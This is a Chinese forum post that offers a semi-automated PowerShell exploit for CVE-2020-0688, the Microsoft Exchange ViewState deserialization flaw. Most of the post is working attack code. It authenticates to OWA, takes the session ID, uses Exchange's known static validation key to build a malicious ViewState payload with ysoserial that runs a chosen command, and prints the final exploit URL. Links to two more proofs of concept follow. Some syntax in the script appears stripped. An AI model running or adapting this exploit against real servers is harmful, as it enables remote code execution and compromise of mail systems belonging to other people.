made 发表于 2020-2-27 10:43:16

CVE-2020-0688 powershell 半自动版

内容来自于一个朋友

需要修改的部分:
$target='https://192.168.137.2'
$username='jerry'
$pass='Admin12345'
$command='calc.exe'

ysoserial.exe 放当前目录

$target='https://192.168.137.2'
$username='jerry'
$pass='Admin12345'
$command='calc.exe'

::ServerCertificateValidationCallback = { $true }
$destination=::EscapeDataString($target)
$response= Invoke-WebRequest -Uri "$target/owa/auth.owa" -Method "POST" -Headers @{"User-Agent"="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36"; "Sec-Fetch-Dest"="document"; "Accept"="text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"; "Sec-Fetch-Site"="same-origin"; "Sec-Fetch-Mode"="navigate"; "Accept-Encoding"="gzip, deflate, br"; "Accept-Language"="zh-CN,zh;q=0.9,en;q=0.8";} -ContentType "application/x-www-form-urlencoded" -Body "destination=$destination%2Fecp%2Fdefault.aspx&flags=4&forcedownlevel=0&username=$username&password=$pass&passwordText=&isUtf8=1"
$Headers= $response.Headers
$cookie=$Headers['Set-cookie'] -match 'ASP.NET_SessionId=([\w\d-]+)'
$ASP_NET_SessionId=$Matches
$VIEWSTATEGENERATOR='B97B4E27'
$validationkey = 'CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF'


write-host "Exec: .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$ASP_NET_SessionId`" --isdebug -–islegacy"
$yso= .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$ASP_NET_SessionId`" --isdebug –-islegacy
$generator=$yso -match "^(?:{4})*(?:{2}==|{3}=)?$"
$ViewState=$response.Forms.Fields.__VIEWSTATE
write-host "$target/ecp/default.aspx?__VIEWSTATEGENERATOR=$generator&__VIEWSTATE=$ViewState"



另外附加2个poc:
https://github.com/Jumbo-WJB/CVE-2020-0688
https://github.com/random-robbie/cve-2020-0688
页: [1]
查看完整版本: CVE-2020-0688 powershell 半自动版